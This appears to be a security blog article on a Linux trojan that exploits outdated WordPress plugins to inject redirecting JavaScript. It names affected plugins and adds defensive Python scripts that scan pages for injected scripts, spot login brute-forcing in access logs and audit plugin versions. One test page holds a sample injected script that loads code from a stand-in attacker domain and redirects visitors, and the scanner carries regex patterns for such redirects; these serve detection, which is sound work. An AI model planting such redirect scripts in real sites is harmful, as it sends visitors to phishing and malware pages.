
Linux Malware Targets 30+ WordPress Plugins


Author: Eva Georgieva / Last Updated: 01/15/2022

Reviewed By: Dalibor Gašić

Summary Of The Attack

  • A Linux trojan exploits outdated plugins and themes on WordPress sites to inject malicious JavaScript that redirects visitors to attacker-controlled pages.
  • Two versions of the trojan exist; the second is an improved version of the first.
  • Both versions carry unimplemented brute-force code, so attackers may be able to take over administrator accounts even after the plugins have been updated.
  • Keeping every component of a WordPress site up to date is essential.

What Happened?

A Linux backdoor has been discovered that can exploit around 30 vulnerable WordPress plugins and themes. Its goal is to inject malicious JavaScript into the compromised pages so that visitors are redirected to harmful sites, including malware-distribution and phishing pages, set up by the attackers.

What Was The Impact?

Such exploitation is possible because the affected WordPress sites are running outdated versions of plugins and themes that carry known vulnerabilities.

Once a visitor lands on an infected WordPress page, the injected script immediately redirects their browser to a malicious web page where they:

  • Fall victim to malvertising.
  • Are tricked into downloading malware onto their computers.
  • Become targets of phishing attacks.


WordPress Exploit Version 1 & 2

Doctor Web (Dr.Web), an antivirus vendor, discovered the malware and named it Linux.BackDoor.WordPressExploit.1.

The trojan attacks websites that run outdated, vulnerable plugins or themes. Once it confirms that a target site has one of those plugins installed, it exploits the flaw and, acting as a backdoor, injects into the site's pages malicious JavaScript that it fetches from a remote Command and Control (C2) server.

Whenever a visitor loads an infected page, the injected JavaScript runs before the page's own content and redirects the browser to a site chosen by the attackers.
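As an added example (not code from the article or from Doctor Web's analysis), the script below is the check a site owner would run over rendered pages to find this kind of injection: it parses every script tag in document order and flags external sources outside an allow-list of the site's own hosts, as well as inline code that forces a navigation. The sample pages, the allowed hosts and the attacker domain are all constructed here; the article gives no indicators of compromise.

```python
"""Find injected redirect scripts in rendered WordPress pages.

Added example, not code from the article or from Doctor Web. The trojan's
payload needs one of two things in a page: a <script src=...> loaded from a
domain the site does not own, or inline script that forces a navigation.
Both pages below are constructed, as are the allow-listed hosts and the
attacker domain (.invalid is a reserved TLD).
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption for the demo).
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "cdnjs.cloudflare.com"}

# Inline constructs that navigate the browser away from the page.
REDIRECT_RE = re.compile(
    r"(?:window|document|top|self)\.location(?:\.href)?\s*=[^=]"
    r"|location\.(?:replace|assign)\s*\("
)


class ScriptCollector(HTMLParser):
    """Collect (src, inline_body) for every <script> in document order."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None  # None while not inside a <script> element

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._buf = None


def scan_page(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return one finding string per suspicious <script>; an empty list means clean.

    Indexes start at 0, so a finding at index 0 means the suspicious script
    sits ahead of everything else in the page, which is how injected code
    manages to run before the site's own scripts.
    """
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for index, (src, body) in enumerate(parser.scripts):
        if src:
            # urlparse handles protocol-relative "//host/x.js"; a site-relative
            # path such as "/wp-includes/js/..." has no hostname and is skipped.
            host = urlparse(src.strip()).hostname
            if host and host.lower() not in allowed_hosts:
                findings.append(f"script #{index}: external src from {host}")
        elif REDIRECT_RE.search(body):
            findings.append(f"script #{index}: inline redirect")
    return findings


# Constructed page as the site serves it normally.
CLEAN_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.17.21/lodash.min.js"></script>
<script>document.addEventListener("DOMContentLoaded", function () { console.log("ready"); });</script>
</head><body><p>Welcome</p></body></html>"""

# Constructed page after the injection: the attacker's code sits ahead of the
# site's own scripts, so it runs first and redirects before the page renders.
INFECTED_PAGE = """<html><head>
<script src="//malicious-redirect.invalid/code.js"></script>
<script>if (!document.cookie.includes("visited")) { window.location.href = "https://malicious-redirect.invalid/land"; }</script>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
</head><body><p>Welcome</p></body></html>"""

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(label, scan_page(page) or "no findings")
```

The external-source check is the robust half: an obfuscated inline payload will slip past the regular expression, but the loader still has to name the attacker's domain somewhere. Run it over the pages as a browser would receive them (the rendered HTML, not the theme files), because the injection may live in the database rather than on disk.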

 

The second version, Linux.BackDoor.WordPressExploit.2, differs from the first in the address of its C2 server and in the domain from which the JavaScript used in the attack is downloaded; it also adds exploits for further plugins.

 

Around 30 outdated themes and plugins are targeted and should be updated immediately; those identified include:

  • WP Live Chat Support Plugin
  • Thim Core
  • Yellow Pencil Visual Theme Customizer Plugin
  • Easysmtp
  • WordPress – Yuzo Related Posts
  • WP GDPR Compliance Plugin
  • Newspaper Theme on WordPress Access Control (CVE-2016-10972)
  • WP Quick Booking Manager
  • Google Code Inserter
  • Post Custom Templates Lite
  • Total Donations Plugin
  • Facebook Live Chat by Zotabox
  • Blog Designer WordPress Plugin
  • WP Live Chat
  • WordPress Ultimate FAQ (CVE-2019-17232 and CVE-2019-17233)
  • WordPress ND Shortcodes For Visual Composer
  • WP-Matomo Integration (WP-Piwik)
  • Hybrid
  • Coming Soon Page and Maintenance Mode

The Future Of The Attack

According to Doctor Web's initial research, both version 1 and version 2 of the trojan contain unimplemented functionality for brute-forcing the administrator accounts of targeted websites using crafted username and password dictionaries.

If that functionality is completed, the attackers could compromise these websites even after the vulnerable plugin and theme versions have been patched.
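Password guessing against a WordPress login leaves a clear trace in the web server's access log, so a site owner can watch for it now rather than wait for the trojan's brute-force code to be finished. The script below is an added example (not code from the article): it parses Combined Log Format lines, counts rejected login POSTs per client and reports any client that exceeds a threshold inside a sliding window. The log lines are constructed, and the threshold and window size are assumptions to tune for your own traffic.

```python
"""Spot password guessing against wp-login.php and xmlrpc.php in access logs.

Added example, not code from the article. wp-login.php answers a rejected
credential with HTTP 200 (the form is re-rendered with an error) and an
accepted one with a 302 to wp-admin; xmlrpc.php returns 200 either way, so
every POST to it counts as an attempt. A burst of such requests from one
client inside a short window is the signal. The log lines are constructed
(Combined Log Format); the threshold and window are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}

# Constructed sample: one client hammering wp-login.php, one legitimate user
# who mistypes once and then succeeds, one slow xmlrpc.php prober.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jan/2023:10:00:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3901 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jan/2023:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jan/2023:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jan/2023:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jan/2023:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jan/2023:10:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jan/2023:10:00:05 +0000] "POST /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
198.51.100.4 - - [05/Jan/2023:10:03:10 +0000] "GET /wp-login.php HTTP/1.1" 200 3901 "-" "Mozilla/5.0"
198.51.100.4 - - [05/Jan/2023:10:03:25 +0000] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
198.51.100.4 - - [05/Jan/2023:10:03:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [05/Jan/2023:11:30:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "python-requests/2.28"
192.0.2.9 - - [05/Jan/2023:11:45:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "python-requests/2.28"
this line is not an access-log record and is ignored
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop the query string
        "status": int(m["status"]),
    }


def is_login_attempt(ev):
    """True for a POST to a login endpoint that did not end in a successful redirect."""
    if ev["method"] != "POST" or ev["path"] not in LOGIN_PATHS:
        return False
    return ev["path"] == "/xmlrpc.php" or ev["status"] == 200


def find_bruteforce(log_text, threshold=5, window_minutes=5):
    """Return {ip: most attempts seen inside one window} for clients at or over threshold."""
    window = timedelta(minutes=window_minutes)
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and is_login_attempt(ev):
            per_ip[ev["ip"]].append(ev["ts"])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        best = start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window's left edge forward
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))
```

Alerting is only half of the control: the same counts can feed a temporary block (fail2ban, a web application firewall rule, or a login-limiting plugin), and disabling xmlrpc.php where nothing uses it removes the second endpoint altogether. A slow, distributed dictionary attack will stay under any per-client threshold, which is why the strong-password step in the next section matters regardless.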


How Can This Attack Be Prevented?

Remediation and prevention for this type of attack consist of two steps:

  1. Update the plugins and themes on your WordPress website, and remove any that are no longer maintained.
  2. Use strong, unique passwords for every WordPress account, administrator accounts in particular.

To check whether a plugin is outdated, look it up in the WordPress Plugin Directory, which shows the plugin's current version, when it was last updated and whether it is still maintained, and compare that with the version installed on your site.
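Comparing the directory's version number with what is actually installed is the step people skip, so here is an added example (not code from the article) that does it from the server side. Every WordPress plugin declares its name and version in the comment header of its main PHP file; the script reads those headers from a plugins directory and reports any plugin below a minimum safe version. The plugin tree and the minimum-version table are constructed for the demo with made-up slugs and numbers; in practice the table comes from the Plugin Directory or a vulnerability feed.

```python
"""Inventory installed plugins from their file headers and flag outdated ones.

Added example, not code from the article. WordPress reads "Plugin Name:" and
"Version:" from the first 8 KB of a plugin's main PHP file; this does the same
and compares against a minimum-safe-version table. The plugin tree, slugs,
versions and thresholds below are constructed for the demo.
"""
import os
import re
import shutil
import tempfile

HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Version):\s*(.+?)\s*$", re.MULTILINE)


def read_plugin_header(php_path):
    """Return the recognised header fields from the first 8 KB of a PHP file."""
    with open(php_path, "r", encoding="utf-8", errors="replace") as fh:
        head = fh.read(8192)
    return dict(HEADER_RE.findall(head))


def version_tuple(version):
    """Numeric tuple for comparison: '1.10' > '1.9', and '1.2.0' == '1.2'."""
    parts = [int(p) if p.isdigit() else 0 for p in re.split(r"[.\-]", version.strip())]
    while parts and parts[-1] == 0:
        parts.pop()
    return tuple(parts)


def find_main_plugin_file(plugin_dir):
    """The main file is the top-level .php file that carries a Plugin Name header."""
    for name in sorted(os.listdir(plugin_dir)):
        if name.endswith(".php"):
            hdr = read_plugin_header(os.path.join(plugin_dir, name))
            if "Plugin Name" in hdr:
                return hdr
    return {}


def audit_plugins(plugins_root, minimum_safe):
    """Map slug -> (installed, minimum) for every plugin below its safe version."""
    outdated = {}
    for slug in sorted(os.listdir(plugins_root)):
        path = os.path.join(plugins_root, slug)
        if os.path.isdir(path):
            hdr = find_main_plugin_file(path)
        elif slug.endswith(".php"):
            hdr = read_plugin_header(path)  # single-file plugin such as hello.php
        else:
            continue
        installed, minimum = hdr.get("Version"), minimum_safe.get(slug)
        if installed and minimum and version_tuple(installed) < version_tuple(minimum):
            outdated[slug] = (installed, minimum)
    return outdated


# Constructed plugin tree: slugs, names and versions are made up for the demo.
SAMPLE_PLUGINS = {
    "acme-live-chat/acme-live-chat.php": ("Acme Live Chat", "1.4.2"),
    "acme-related-posts/acme-related-posts.php": ("Acme Related Posts", "5.12.94"),
    "classic-editor/classic-editor.php": ("Classic Editor", "1.6.2"),
}
# Constructed minimum safe versions (an assumption standing in for a real feed).
MINIMUM_SAFE = {"acme-live-chat": "1.4.3", "acme-related-posts": "5.13", "classic-editor": "1.6"}


def build_demo_tree():
    """Write the constructed plugins into a temporary wp-content/plugins lookalike."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    for rel, (name, version) in SAMPLE_PLUGINS.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(f"<?php\n/**\n * Plugin Name: {name}\n * Plugin URI: https://example.com/{rel}\n * Version: {version}\n */\n")
    with open(os.path.join(root, "hello.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n/*\nPlugin Name: Hello Dolly\nVersion: 1.7.2\n*/\n")
    return root


def demo():
    """Build the constructed tree, audit it, clean up, and return the outdated map."""
    root = build_demo_tree()
    try:
        return audit_plugins(root, MINIMUM_SAFE)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for slug, (installed, minimum) in demo().items():
        print(f"{slug}: installed {installed}, minimum safe {minimum}")
```

Point `audit_plugins` at a real `wp-content/plugins` directory and a table you maintain from the directory's listings. If WP-CLI is available on the host, `wp plugin list --update=available` performs the live comparison against wordpress.org directly, but it cannot tell you about a plugin that has been pulled from the directory, which is why the maintained-or-not check in the directory still has to be done by hand.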

 


Eva Georgieva

Eva is a security engineer, researcher, and penetration tester with over 5 years of experience working on both red teams and blue teams.
